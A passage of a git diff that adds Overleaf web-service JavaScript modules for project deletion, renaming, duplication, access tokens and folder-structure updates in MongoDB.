Errors.NotFoundError( + `No deleted project found for project id ${projectId}` + ) + } + if (!deletedProject.project) { + logger.warn( + { projectId }, + `Attempted to expire already-expired deletedProject` + ) + return + } + + const historyId = + deletedProject.project.overleaf && + deletedProject.project.overleaf.history && + deletedProject.project.overleaf.history.id + + await Promise.all([ + DocstoreManager.promises.destroyProject(deletedProject.project._id), + HistoryManager.promises.deleteProject( + deletedProject.project._id, + historyId + ), + FilestoreHandler.promises.deleteProject(deletedProject.project._id), + ChatApiHandler.promises.destroyProject(deletedProject.project._id), + hardDeleteDeletedFiles(deletedProject.project._id), + ProjectAuditLogEntry.deleteMany({ projectId }), + Modules.promises.hooks.fire('projectExpired', deletedProject.project._id), + ]) + + await DeletedProject.updateOne( + { + _id: deletedProject._id, + }, + { + $set: { + 'deleterData.deleterIpAddress': null, + project: null, + }, + } + ).exec() + } catch (error) { + logger.warn({ projectId, error }, 'error expiring deleted project') + throw error + } +} + +function filterDuplicateDeletedFilesInPlace(project) { + const fileIds = new Set() + project.deletedFiles = project.deletedFiles.filter(file => { + const id = file._id.toString() + if (fileIds.has(id)) return false + fileIds.add(id) + return true + }) +} + +let deletedFilesProjectIdIndexExist +async function doesDeletedFilesProjectIdIndexExist() { + if (typeof deletedFilesProjectIdIndexExist !== 'boolean') { + // Resolve this about once. No need for locking or retry handling. + deletedFilesProjectIdIndexExist = + await db.deletedFiles.indexExists('projectId_1') + } + return deletedFilesProjectIdIndexExist +} + +async function hardDeleteDeletedFiles(projectId) { + if (!(await doesDeletedFilesProjectIdIndexExist())) { + // Running the deletion command w/o index would kill mongo performance + return + } + return db.deletedFiles.deleteMany({ projectId }) +} diff --git a/services/web/app/src/Features/Project/ProjectDetailsHandler.js b/services/web/app/src/Features/Project/ProjectDetailsHandler.js new file mode 100644 index 0000000..33551ab --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectDetailsHandler.js @@ -0,0 +1,250 @@ +const _ = require('lodash') +const ProjectGetter = require('./ProjectGetter') +const UserGetter = require('../User/UserGetter') +const { Project } = require('../../models/Project') +const logger = require('@overleaf/logger') +const TpdsUpdateSender = require('../ThirdPartyDataStore/TpdsUpdateSender') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const Errors = require('../Errors/Errors') +const TokenGenerator = require('../TokenGenerator/TokenGenerator') +const ProjectHelper = require('./ProjectHelper') +const settings = require('@overleaf/settings') +const { callbackify } = require('util') + +const MAX_PROJECT_NAME_LENGTH = 150 + +module.exports = { + MAX_PROJECT_NAME_LENGTH, + getDetails: callbackify(getDetails), + getProjectDescription: callbackify(getProjectDescription), + setProjectDescription: callbackify(setProjectDescription), + renameProject: callbackify(renameProject), + validateProjectName: callbackify(validateProjectName), + generateUniqueName: callbackify(generateUniqueName), + setPublicAccessLevel: callbackify(setPublicAccessLevel), + ensureTokensArePresent: callbackify(ensureTokensArePresent), + clearTokens: callbackify(clearTokens), + fixProjectName, + promises: { + getDetails, + getProjectDescription, + setProjectDescription, + renameProject, + validateProjectName, + generateUniqueName, + setPublicAccessLevel, + ensureTokensArePresent, + clearTokens, + }, +} + +async function getDetails(projectId) { + let project + try { + project = await ProjectGetter.promises.getProject(projectId, { + name: true, + description: true, + compiler: true, + features: true, + owner_ref: true, + overleaf: true, + }) + } catch (err) { + logger.warn({ err, projectId }, 'error getting project') + throw err + } + if (project == null) { + throw new Errors.NotFoundError('project not found') + } + const user = await UserGetter.promises.getUser(project.owner_ref) + const details = { + name: project.name, + description: project.description, + compiler: project.compiler, + features: + user != null && user.features != null + ? user.features + : settings.defaultFeatures, + } + if (project.overleaf != null) { + details.overleaf = project.overleaf + } + return details +} + +async function getProjectDescription(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + description: true, + }) + if (project == null) { + return undefined + } + return project.description +} + +async function setProjectDescription(projectId, description) { + const conditions = { _id: projectId } + const update = { description } + logger.debug( + { conditions, update, projectId, description }, + 'setting project description' + ) + try { + await Project.updateOne(conditions, update).exec() + } catch (err) { + logger.warn({ err }, 'something went wrong setting project description') + throw err + } +} +async function renameProject(projectId, newName) { + newName = newName.trim() + await validateProjectName(newName) + logger.debug({ projectId, newName }, 'renaming project') + let project + try { + project = await ProjectGetter.promises.getProject(projectId, { name: true }) + } catch (err) { + logger.warn({ err, projectId }, 'error getting project') + throw err + } + if (project == null) { + logger.warn({ projectId }, 'could not find project to rename') + return + } + const oldProjectName = project.name + await Project.updateOne({ _id: projectId }, { name: newName }).exec() + await TpdsUpdateSender.promises.moveEntity({ + projectId, + projectName: oldProjectName, + newProjectName: newName, + }) +} + +async function validateProjectName(name) { + if (name == null || name.length === 0) { + throw new Errors.InvalidNameError('Project name cannot be blank') + } + if (name.length > MAX_PROJECT_NAME_LENGTH) { + throw new Errors.InvalidNameError('Project name is too long') + } + if (name.indexOf('/') > -1) { + throw new Errors.InvalidNameError( + 'Project name cannot contain / characters' + ) + } + if (name.indexOf('\\') > -1) { + throw new Errors.InvalidNameError( + 'Project name cannot contain \\ characters' + ) + } + if (name !== name.trim()) { + throw new Errors.InvalidNameError( + 'Project name cannot start or end with whitespace' + ) + } +} + +// FIXME: we should put a lock around this to make it completely safe, but we would need to do that at +// the point of project creation, rather than just checking the name at the start of the import. +// If we later move this check into ProjectCreationHandler we can ensure all new projects are created +// with a unique name. But that requires thinking through how we would handle incoming projects from +// dropbox for example. +async function generateUniqueName(userId, name, suffixes = []) { + const allUsersProjectNames = + await ProjectGetter.promises.findAllUsersProjects(userId, { name: 1 }) + // allUsersProjectNames is returned as a hash {owned: [name1, name2, ...], readOnly: [....]} + // collect all of the names and flatten them into a single array + const projectNameList = _.map( + _.flattenDeep(_.values(allUsersProjectNames)), + 'name' + ) + const uniqueName = await ProjectHelper.promises.ensureNameIsUnique( + projectNameList, + name, + suffixes, + MAX_PROJECT_NAME_LENGTH + ) + return uniqueName +} + +function fixProjectName(name) { + // Remove any leading or trailing whitespace + name = typeof name === 'string' ? name.trim() : '' + // Apply a default name if the name is empty + if (name === '') { + name = 'Untitled' + } + if (name.indexOf('/') > -1) { + // v2 does not allow / in a project name + name = name.replace(/\//g, '-') + } + if (name.indexOf('\\') > -1) { + // backslashes in project name will prevent syncing to dropbox + name = name.replace(/\\/g, '') + } + if (name.length > MAX_PROJECT_NAME_LENGTH) { + name = name.substr(0, MAX_PROJECT_NAME_LENGTH) + } + // Remove any leading or trailing whitespace after fixing + name = name.trim() + return name +} + +async function setPublicAccessLevel(projectId, newAccessLevel) { + if ( + projectId != null && + newAccessLevel != null && + _.includes( + [PublicAccessLevels.PRIVATE, PublicAccessLevels.TOKEN_BASED], + newAccessLevel + ) + ) { + await Project.updateOne( + { _id: projectId }, + { publicAccesLevel: newAccessLevel } + ).exec() + } else { + throw new Errors.InvalidError('unexpected access level') + } +} + +async function ensureTokensArePresent(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + tokens: 1, + }) + if ( + project.tokens != null && + project.tokens.readOnly != null && + project.tokens.readAndWrite != null + ) { + return + } + await _generateTokens(project) + await Project.updateOne( + { _id: projectId }, + { $set: { tokens: project.tokens } } + ).exec() +} + +async function clearTokens(projectId) { + await Project.updateOne( + { _id: projectId }, + { $unset: { tokens: 1 }, $set: { publicAccesLevel: 'private' } } + ).exec() +} + +async function _generateTokens(project, callback) { + if (!project.tokens) { + project.tokens = {} + } + const { tokens } = project + if (tokens.readAndWrite == null) { + const { token, numericPrefix } = TokenGenerator.readAndWriteToken() + tokens.readAndWrite = token + tokens.readAndWritePrefix = numericPrefix + } + if (tokens.readOnly == null) { + tokens.readOnly = + await TokenGenerator.promises.generateUniqueReadOnlyToken() + } +} diff --git a/services/web/app/src/Features/Project/ProjectDuplicator.js b/services/web/app/src/Features/Project/ProjectDuplicator.js new file mode 100644 index 0000000..47c00ed --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectDuplicator.js @@ -0,0 +1,312 @@ +const { callbackify } = require('util') +const Path = require('path') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const { promiseMapWithLimit } = require('@overleaf/promise-utils') +const { Doc } = require('../../models/Doc') +const { File } = require('../../models/File') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const FileStoreHandler = require('../FileStore/FileStoreHandler') +const HistoryManager = require('../History/HistoryManager') +const ProjectCreationHandler = require('./ProjectCreationHandler') +const ProjectDeleter = require('./ProjectDeleter') +const ProjectEntityMongoUpdateHandler = require('./ProjectEntityMongoUpdateHandler') +const ProjectEntityUpdateHandler = require('./ProjectEntityUpdateHandler') +const ProjectGetter = require('./ProjectGetter') +const ProjectLocator = require('./ProjectLocator') +const ProjectOptionsHandler = require('./ProjectOptionsHandler') +const SafePath = require('./SafePath') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const _ = require('lodash') +const TagsHandler = require('../Tags/TagsHandler') +const Features = require('../../infrastructure/Features') +const ClsiCacheManager = require('../Compile/ClsiCacheManager') + +module.exports = { + duplicate: callbackify(duplicate), + promises: { + duplicate, + }, +} + +async function duplicate(owner, originalProjectId, newProjectName, tags = []) { + await DocumentUpdaterHandler.promises.flushProjectToMongo(originalProjectId) + const originalProject = await ProjectGetter.promises.getProject( + originalProjectId, + { + compiler: true, + imageName: true, + rootFolder: true, + rootDoc_id: true, + fromV1TemplateId: true, + fromV1TemplateVersionId: true, + overleaf: true, + } + ) + const { path: rootDocPath } = await ProjectLocator.promises.findRootDoc({ + project_id: originalProjectId, + }) + + const originalEntries = _getFolderEntries(originalProject.rootFolder[0]) + + // Pass template ID as analytics segmentation if duplicating project from a template + const segmentation = _.pick(originalProject, [ + 'fromV1TemplateId', + 'fromV1TemplateVersionId', + ]) + segmentation.duplicatedFromProject = originalProjectId + + // count the number of tags before and after, for analytics + segmentation['original-tags'] = + await TagsHandler.promises.countTagsForProject( + owner._id, + originalProject._id + ) + segmentation['updated-tags'] = tags.length + + // remove any leading or trailing spaces + newProjectName = newProjectName.trim() + + // Now create the new project, cleaning it up on failure if necessary + const newProject = await ProjectCreationHandler.promises.createBlankProject( + owner._id, + newProjectName, + { segmentation } + ) + + let prepareClsiCacheInBackground = Promise.resolve() + if (originalProject.imageName === newProject.imageName) { + // Populate the clsi-cache unless the TeXLive release has changed. + prepareClsiCacheInBackground = ClsiCacheManager.prepareClsiCache( + newProject._id, + owner._id, + { sourceProjectId: originalProjectId } + ).catch(err => { + logger.warn( + { err, originalProjectId, projectId: newProject._id }, + 'failed to prepare clsi-cache for cloned project' + ) + }) + } + + try { + await ProjectOptionsHandler.promises.setCompiler( + newProject._id, + originalProject.compiler + ) + const [docEntries, fileEntries] = await Promise.all([ + _copyDocs(originalEntries.docEntries, originalProject, newProject), + _copyFiles(originalEntries.fileEntries, originalProject, newProject), + ]) + const projectVersion = + await ProjectEntityMongoUpdateHandler.promises.createNewFolderStructure( + newProject._id, + docEntries, + fileEntries + ) + // Silently ignore the rootDoc in case it's not valid per the new limits. + if ( + rootDocPath && + ProjectEntityUpdateHandler.isPathValidForRootDoc(rootDocPath.fileSystem) + ) { + await _setRootDoc(newProject._id, rootDocPath.fileSystem) + } + await _notifyDocumentUpdater(newProject, owner._id, { + newFiles: fileEntries, + newDocs: docEntries, + newProject: { version: projectVersion }, + }) + await TpdsProjectFlusher.promises.flushProjectToTpds(newProject._id) + + if (tags?.length > 0) { + await TagsHandler.promises.addProjectToTags( + owner._id, + tags.map(tag => tag.id), + newProject._id + ) + } + } catch (err) { + // Clean up broken clone on error. + // Make sure we delete the new failed project, not the original one! + await ProjectDeleter.promises.deleteProject(newProject._id) + throw OError.tag(err, 'error cloning project, broken clone deleted', { + originalProjectId, + newProjectName, + newProjectId: newProject._id, + }) + } + + try { + await prepareClsiCacheInBackground + } catch {} + + return newProject +} + +function _getFolderEntries(folder, folderPath = '/') { + const docEntries = [] + const fileEntries = [] + const docs = folder.docs || [] + const files = folder.fileRefs || [] + const subfolders = folder.folders || [] + + for (const doc of docs) { + if (doc == null || doc._id == null) { + continue + } + const path = Path.join(folderPath, doc.name) + docEntries.push({ doc, path }) + } + + for (const file of files) { + if (file == null || file._id == null) { + continue + } + const path = Path.join(folderPath, file.name) + fileEntries.push({ file, path }) + } + + for (const subfolder of subfolders) { + if (subfolder == null || subfolder._id == null) { + continue + } + const subfolderPath = Path.join(folderPath, subfolder.name) + const subfolderEntries = _getFolderEntries(subfolder, subfolderPath) + for (const docEntry of subfolderEntries.docEntries) { + docEntries.push(docEntry) + } + for (const fileEntry of subfolderEntries.fileEntries) { + fileEntries.push(fileEntry) + } + } + return { docEntries, fileEntries } +} + +async function _copyDocs(sourceEntries, sourceProject, targetProject) { + const docLinesById = await _getDocLinesForProject(sourceProject._id) + const targetEntries = [] + for (const sourceEntry of sourceEntries) { + const sourceDoc = sourceEntry.doc + const path = sourceEntry.path + const doc = new Doc({ name: sourceDoc.name }) + const docLines = docLinesById.get(sourceDoc._id.toString()) + await DocstoreManager.promises.updateDoc( + targetProject._id.toString(), + doc._id.toString(), + docLines, + 0, + {} + ) + targetEntries.push({ doc, path, docLines: docLines.join('\n') }) + } + return targetEntries +} + +async function _getDocLinesForProject(projectId) { + const docs = await DocstoreManager.promises.getAllDocs(projectId) + const docLinesById = new Map(docs.map(doc => [doc._id, doc.lines])) + return docLinesById +} + +async function _copyFiles(sourceEntries, sourceProject, targetProject) { + const sourceHistoryId = sourceProject.overleaf?.history?.id + const targetHistoryId = targetProject.overleaf?.history?.id + if (!sourceHistoryId) { + throw new OError('missing history id', { sourceProject }) + } + if (!targetHistoryId) { + throw new OError('missing history id', { targetProject }) + } + + const targetEntries = await promiseMapWithLimit( + 5, + sourceEntries, + async sourceEntry => { + const sourceFile = sourceEntry.file + const path = sourceEntry.path + const file = new File({ name: SafePath.clean(sourceFile.name) }) + if (sourceFile.linkedFileData != null) { + file.linkedFileData = sourceFile.linkedFileData + file.created = sourceFile.created + } + if (sourceFile.hash != null) { + file.hash = sourceFile.hash + } + let createdBlob = false + const usingFilestore = Features.hasFeature('filestore') + if (file.hash != null && Features.hasFeature('project-history-blobs')) { + try { + await HistoryManager.promises.copyBlob( + sourceHistoryId, + targetHistoryId, + file.hash + ) + createdBlob = true + if (!usingFilestore) { + return { createdBlob, file, path, url: null } + } + } catch (err) { + if (!usingFilestore) { + throw OError.tag(err, 'unexpected error copying blob', { + sourceProjectId: sourceProject._id, + targetProjectId: targetProject._id, + sourceFile, + sourceHistoryId, + }) + } else { + logger.error( + { + err, + sourceProjectId: sourceProject._id, + targetProjectId: targetProject._id, + sourceFile, + sourceHistoryId, + }, + 'unexpected error copying blob' + ) + } + } + } + if (createdBlob && Features.hasFeature('project-history-blobs')) { + return { createdBlob, file, path, url: null } + } + if (!usingFilestore) { + // Note: This is also checked in app.mjs + throw new OError( + 'bad config: need to enable either filestore or project-history-blobs' + ) + } + const url = await FileStoreHandler.promises.copyFile( + sourceProject._id, + sourceFile._id, + targetProject._id, + file._id + ) + + return { createdBlob, file, path, url } + } + ) + return targetEntries +} + +async function _setRootDoc(projectId, path) { + const { element: rootDoc } = await ProjectLocator.promises.findElementByPath({ + project_id: projectId, + path, + exactCaseMatch: true, + }) + await ProjectEntityUpdateHandler.promises.setRootDoc(projectId, rootDoc._id) +} + +async function _notifyDocumentUpdater(project, userId, changes) { + const projectHistoryId = + project.overleaf && project.overleaf.history && project.overleaf.history.id + await DocumentUpdaterHandler.promises.updateProjectStructure( + project._id, + projectHistoryId, + userId, + changes, + null + ) +} diff --git a/services/web/app/src/Features/Project/ProjectEditorHandler.js b/services/web/app/src/Features/Project/ProjectEditorHandler.js new file mode 100644 index 0000000..a85e8b5 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEditorHandler.js @@ -0,0 +1,156 @@ +let ProjectEditorHandler +const _ = require('lodash') +const Path = require('path') +const Features = require('../../infrastructure/Features') + +function mergeDeletedDocs(a, b) { + const docIdsInA = new Set(a.map(doc => doc._id.toString())) + return a.concat(b.filter(doc => !docIdsInA.has(doc._id.toString()))) +} + +module.exports = ProjectEditorHandler = { + trackChangesAvailable: false, + + buildProjectModelView(project, members, invites, deletedDocsFromDocstore) { + let owner, ownerFeatures + if (!Array.isArray(project.deletedDocs)) { + project.deletedDocs = [] + } + project.deletedDocs.forEach(doc => { + // The frontend does not use this field. + delete doc.deletedAt + }) + const result = { + _id: project._id, + name: project.name, + rootDoc_id: project.rootDoc_id, + mainBibliographyDoc_id: project.mainBibliographyDoc_id, + rootFolder: [this.buildFolderModelView(project.rootFolder[0])], + publicAccesLevel: project.publicAccesLevel, + dropboxEnabled: !!project.existsInDropbox, + compiler: project.compiler, + description: project.description, + spellCheckLanguage: project.spellCheckLanguage, + deletedByExternalDataSource: project.deletedByExternalDataSource || false, + deletedDocs: mergeDeletedDocs( + project.deletedDocs, + deletedDocsFromDocstore + ), + members: [], + invites: this.buildInvitesView(invites), + imageName: + project.imageName != null + ? Path.basename(project.imageName) + : undefined, + } + + ;({ owner, ownerFeatures, members } = + this.buildOwnerAndMembersViews(members)) + result.owner = owner + result.members = members + + result.features = _.defaults(ownerFeatures || {}, { + collaborators: -1, // Infinite + versioning: false, + dropbox: false, + compileTimeout: 60, + compileGroup: 'standard', + templates: false, + references: false, + referencesSearch: false, + mendeley: false, + trackChanges: false, + trackChangesVisible: ProjectEditorHandler.trackChangesAvailable, + symbolPalette: false, + }) + + if (result.features.trackChanges) { + result.trackChangesState = project.track_changes || false + } + + // Originally these two feature flags were both signalled by the now-deprecated `references` flag. + // For older users, the presence of the `references` feature flag should still turn on these features. + result.features.referencesSearch = + result.features.referencesSearch || result.features.references + result.features.mendeley = + result.features.mendeley || result.features.references + + return result + }, + + buildOwnerAndMembersViews(members) { + let owner = null + let ownerFeatures = null + const filteredMembers = [] + for (const member of members || []) { + if (member.privilegeLevel === 'owner') { + ownerFeatures = member.user.features + owner = this.buildUserModelView(member) + } else { + filteredMembers.push(this.buildUserModelView(member)) + } + } + return { + owner, + ownerFeatures, + members: filteredMembers, + } + }, + + buildUserModelView(member) { + const user = member.user + return { + _id: user._id, + first_name: user.first_name, + last_name: user.last_name, + email: user.email, + privileges: member.privilegeLevel, + signUpDate: user.signUpDate, + pendingEditor: member.pendingEditor, + pendingReviewer: member.pendingReviewer, + } + }, + + buildFolderModelView(folder) { + const fileRefs = _.filter(folder.fileRefs || [], file => file != null) + return { + _id: folder._id, + name: folder.name, + folders: (folder.folders || []).map(childFolder => + this.buildFolderModelView(childFolder) + ), + fileRefs: fileRefs.map(file => this.buildFileModelView(file)), + docs: (folder.docs || []).map(doc => this.buildDocModelView(doc)), + } + }, + + buildFileModelView(file) { + const additionalFileProperties = {} + + if (Features.hasFeature('project-history-blobs')) { + additionalFileProperties.hash = file.hash + } + + return { + _id: file._id, + name: file.name, + linkedFileData: file.linkedFileData, + created: file.created, + ...additionalFileProperties, + } + }, + + buildDocModelView(doc) { + return { + _id: doc._id, + name: doc.name, + } + }, + + buildInvitesView(invites) { + if (invites == null) { + return [] + } + return invites.map(invite => _.pick(invite, ['_id', 'email', 'privileges'])) + }, +} diff --git a/services/web/app/src/Features/Project/ProjectEntityHandler.js b/services/web/app/src/Features/Project/ProjectEntityHandler.js new file mode 100644 index 0000000..7d0498f --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEntityHandler.js @@ -0,0 +1,220 @@ +const path = require('path') +const DocstoreManager = require('../Docstore/DocstoreManager') +const Errors = require('../Errors/Errors') +const ProjectGetter = require('./ProjectGetter') +const { callbackifyAll } = require('@overleaf/promise-utils') +const OError = require('@overleaf/o-error') +const { iterablePaths } = require('./IterablePath') + +async function getAllDocs(projectId) { + // We get the path and name info from the project, and the lines and + // version info from the doc store. + const docContentsArray = await DocstoreManager.promises.getAllDocs(projectId) + + // Turn array from docstore into a dictionary based on doc id + const docContents = {} + for (const docContent of docContentsArray) { + docContents[docContent._id] = docContent + } + + const folders = await _getAllFolders(projectId) + const docs = {} + for (const { path: folderPath, folder } of folders) { + for (const doc of iterablePaths(folder, 'docs')) { + const content = docContents[doc._id.toString()] + if (content != null) { + docs[path.join(folderPath, doc.name)] = { + _id: doc._id, + name: doc.name, + lines: content.lines, + rev: content.rev, + folder, + } + } + } + } + + return docs +} + +async function getAllFiles(projectId) { + const folders = await _getAllFolders(projectId) + const files = {} + for (const { path: folderPath, folder } of folders) { + for (const file of iterablePaths(folder, 'fileRefs')) { + if (file != null) { + files[path.join(folderPath, file.name)] = { ...file, folder } + } + } + } + return files +} + +async function getAllEntities(projectId) { + const project = await ProjectGetter.promises.getProject(projectId) + if (project == null) { + throw new Errors.NotFoundError('project not found') + } + const entities = getAllEntitiesFromProject(project) + return entities +} + +function getAllEntitiesFromProject(project) { + const folders = _getAllFoldersFromProject(project) + const docs = [] + const files = [] + for (const { path: folderPath, folder } of folders) { + for (const doc of iterablePaths(folder, 'docs')) { + if (doc != null) { + docs.push({ path: path.join(folderPath, doc.name), doc }) + } + } + for (const file of iterablePaths(folder, 'fileRefs')) { + if (file != null) { + files.push({ path: path.join(folderPath, file.name), file }) + } + } + } + return { docs, files, folders } +} + +async function getAllDocPathsFromProjectById(projectId) { + const project = + await ProjectGetter.promises.getProjectWithoutDocLines(projectId) + if (project == null) { + throw new Errors.NotFoundError('no project') + } + const docPaths = getAllDocPathsFromProject(project) + return docPaths +} + +function getAllDocPathsFromProject(project) { + const folders = _getAllFoldersFromProject(project) + const docPath = {} + for (const { path: folderPath, folder } of folders) { + for (const doc of iterablePaths(folder, 'docs')) { + docPath[doc._id] = path.join(folderPath, doc.name) + } + } + return docPath +} + +/** + * + * @param {string} projectId + * @param {string} docId + * @param {{peek?: boolean, include_deleted?: boolean}} options + * @return {Promise<{lines: *, rev: *, version: *, ranges: *}>} + */ +async function getDoc(projectId, docId, options = {}) { + const { lines, rev, version, ranges } = await DocstoreManager.promises.getDoc( + projectId, + docId, + options + ) + return { lines, rev, version, ranges } +} + +/** + * @param {ObjectId | string} projectId + * @param {ObjectId | string} docId + */ +async function getDocPathByProjectIdAndDocId(projectId, docId) { + const project = + await ProjectGetter.promises.getProjectWithoutDocLines(projectId) + if (project == null) { + throw new Errors.NotFoundError('no project') + } + const docPath = await getDocPathFromProjectByDocId(project, docId) + if (docPath == null) { + throw new Errors.NotFoundError('no doc') + } + return docPath +} + +function _recursivelyFindDocInFolder(basePath, docId, folder) { + const docInCurrentFolder = (folder.docs || []).find( + currentDoc => currentDoc._id.toString() === docId.toString() + ) + if (docInCurrentFolder != null) { + return path.join(basePath, docInCurrentFolder.name) + } else { + let docPath, childFolder + for (childFolder of iterablePaths(folder, 'folders')) { + docPath = _recursivelyFindDocInFolder( + path.join(basePath, childFolder.name), + docId, + childFolder + ) + if (docPath != null) { + return docPath + } + } + return null + } +} + +/** + * @param {Project} project + * @param {ObjectId | string} docId + * @param {Function} callback + */ +async function getDocPathFromProjectByDocId(project, docId) { + const docPath = _recursivelyFindDocInFolder('/', docId, project.rootFolder[0]) + return docPath +} + +async function _getAllFolders(projectId) { + const project = + await ProjectGetter.promises.getProjectWithoutDocLines(projectId) + + if (project == null) { + throw new Errors.NotFoundError('no project') + } + const folders = _getAllFoldersFromProject(project) + return folders +} + +function _getAllFoldersFromProject(project) { + const folders = [] + try { + const processFolder = (basePath, folder) => { + folders.push({ path: basePath, folder }) + if (folder.folders) { + for (const childFolder of iterablePaths(folder, 'folders')) { + if (childFolder.name != null) { + const childPath = path.join(basePath, childFolder.name) + processFolder(childPath, childFolder) + } + } + } + } + processFolder('/', project.rootFolder[0]) + return folders + } catch (err) { + throw OError.tag(err, 'Error getting folders', { projectId: project._id }) + } +} + +const ProjectEntityHandler = { + getAllDocs, + getAllFiles, + getAllEntities, + getAllDocPathsFromProjectById, + getDoc, + getDocPathByProjectIdAndDocId, + getDocPathFromProjectByDocId, + _getAllFolders, +} + +module.exports = { + ...callbackifyAll(ProjectEntityHandler, { + multiResult: { + getDoc: ['lines', 'rev', 'version', 'ranges'], + }, + }), + promises: ProjectEntityHandler, + getAllEntitiesFromProject, + getAllDocPathsFromProject, + _getAllFoldersFromProject, +} diff --git a/services/web/app/src/Features/Project/ProjectEntityMongoUpdateHandler.js b/services/web/app/src/Features/Project/ProjectEntityMongoUpdateHandler.js new file mode 100644 index 0000000..84002f1 --- /dev/null +++ b/services/web/app/src/Features/Project/ProjectEntityMongoUpdateHandler.js @@ -0,0 +1,764 @@ +const { callbackify } = require('util') +const { callbackifyMultiResult } = require('@overleaf/promise-utils') +const logger = require('@overleaf/logger') +const path = require('path') +const { ObjectId } = require('mongodb-legacy') +const Settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') +const CooldownManager = require('../Cooldown/CooldownManager') +const Errors = require('../Errors/Errors') +const { Folder } = require('../../models/Folder') +const LockManager = require('../../infrastructure/LockManager') +const { Project } = require('../../models/Project') +const ProjectEntityHandler = require('./ProjectEntityHandler') +const ProjectGetter = require('./ProjectGetter') +const ProjectLocator = require('./ProjectLocator') +const FolderStructureBuilder = require('./FolderStructureBuilder') +const SafePath = require('./SafePath') +const { DeletedFile } = require('../../models/DeletedFile') +const { iterablePaths } = require('./IterablePath') + +const LOCK_NAMESPACE = 'mongoTransaction' +const ENTITY_TYPE_TO_MONGO_PATH_SEGMENT = { + doc: 'docs', + docs: 'docs', + file: 'fileRefs', + files: 'fileRefs', + fileRefs: 'fileRefs', + folder: 'folders', + folders: 'folders', +} + +module.exports = { + LOCK_NAMESPACE, + addDoc: callbackifyMultiResult(wrapWithLock(addDoc), ['result', 'project']), + addFile: callbackifyMultiResult(wrapWithLock(addFile), ['result', 'project']), + addFolder: callbackifyMultiResult(wrapWithLock(addFolder), [ + 'folder', + 'parentFolderId', + ]), + replaceFileWithNew: callbackifyMultiResult(wrapWithLock(replaceFileWithNew), [ + 'oldFileRef', + 'project', + 'path', + 'newProject', + 'newFileRef', + ]), + replaceDocWithFile: callbackify(replaceDocWithFile), + replaceFileWithDoc: callbackify(replaceFileWithDoc), + mkdirp: callbackifyMultiResult(wrapWithLock(mkdirp), [ + 'newFolders', + 'folder', + 'parentFolder', + ]), + moveEntity: callbackifyMultiResult(wrapWithLock(moveEntity), [ + 'project', + 'startPath', + 'endPath', + 'rev', + 'changes', + ]), + deleteEntity: callbackifyMultiResult(wrapWithLock(deleteEntity), [ + 'entity', + 'path', + 'projectBeforeDeletion', + 'newProject', + ]), + renameEntity: callbackifyMultiResult(wrapWithLock(renameEntity), [ + 'project', + 'startPath', + 'endPath', + 'rev', + 'changes', + ]), + createNewFolderStructure: callbackify(wrapWithLock(createNewFolderStructure)), + _insertDeletedFileReference: callbackify(_insertDeletedFileReference), + _putElement: callbackifyMultiResult(_putElement, ['result', 'project']), + _confirmFolder, + promises: { + addDoc: wrapWithLock(addDoc), + addFile: wrapWithLock(addFile), + addFolder: wrapWithLock(addFolder), + replaceFileWithNew: wrapWithLock(replaceFileWithNew), + replaceDocWithFile: wrapWithLock(replaceDocWithFile), + replaceFileWithDoc: wrapWithLock(replaceFileWithDoc), + mkdirp: wrapWithLock(mkdirp), + moveEntity: wrapWithLock(moveEntity), + deleteEntity: wrapWithLock(deleteEntity), + renameEntity: wrapWithLock(renameEntity), + createNewFolderStructure: wrapWithLock(createNewFolderStructure), + _insertDeletedFileReference, + _putElement, + }, +} + +function wrapWithLock(methodWithoutLock) { + // This lock is used whenever we read or write to an existing project's + // structure. Some operations to project structure cannot be done atomically + // in mongo, this lock is used to prevent reading the structure between two + // parts of a staged update. + async function methodWithLock(projectId, ...rest) { + return LockManager.promises.runWithLock(LOCK_NAMESPACE, projectId, () => + methodWithoutLock(projectId, ...rest) + ) + } + return methodWithLock +} + +async function addDoc(projectId, folderId, doc, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { + rootFolder: true, + name: true, + overleaf: true, + } + ) + folderId = _confirmFolder(project, folderId) + const { result, project: newProject } = await _putElement( + project, + folderId, + doc, + 'doc', + userId + ) + return { result, project: newProject } +} + +async function addFile(projectId, folderId, fileRef, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + folderId = _confirmFolder(project, folderId) + const { result, project: newProject } = await _putElement( + project, + folderId, + fileRef, + 'file', + userId + ) + return { result, project: newProject } +} + +async function addFolder(projectId, parentFolderId, folderName, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + parentFolderId = _confirmFolder(project, parentFolderId) + const folder = new Folder({ name: folderName }) + await _putElement(project, parentFolderId, folder, 'folder', userId) + return { folder, parentFolderId } +} + +async function replaceFileWithNew(projectId, fileId, newFileRef, userId) { + const project = await ProjectGetter.promises.getProjectWithoutLock( + projectId, + { rootFolder: true, name: true, overleaf: true } + ) + const { element: fileRef, path } = await ProjectLocator.promises.findElement({ + project, + element_id: fileId, + type: 'file', + }) + await _insertDeletedFileReference(projectId, fileRef) + const newProject = await Project.findOneAndUpdate( + { _id: project._id, [path.mongo]: { $exists: true } }, + { + $set: { + [`${path.mongo}._id`]: newFileRef._id, + [`${path.mongo}.created`]: new Date(), + [`${path.mongo}.linkedFileData`]: newFileRef.linkedFileData, + [`${path.mongo}.hash`]: newFileRef.hash, + lastUpdated: new Date(), + lastUpdatedBy: userId, + }, + $inc: { + version: 1, + [`${path.mongo}.rev`]: 1, + }, + }, + // Note: Mongoose uses new:true to return the modified document + // https://mongoosejs.com/docs/api.html#model_Model.findOneAndUpdate + // but Mongo uses returnNewDocument:true instead + // https://docs.mongodb.com/manual/reference/method/db.collection.findOneAndUpdate/ + // We are using Mongoose here, but if we ever switch to a direct mongo call + // the next line will need to be updated. + { new: true } + 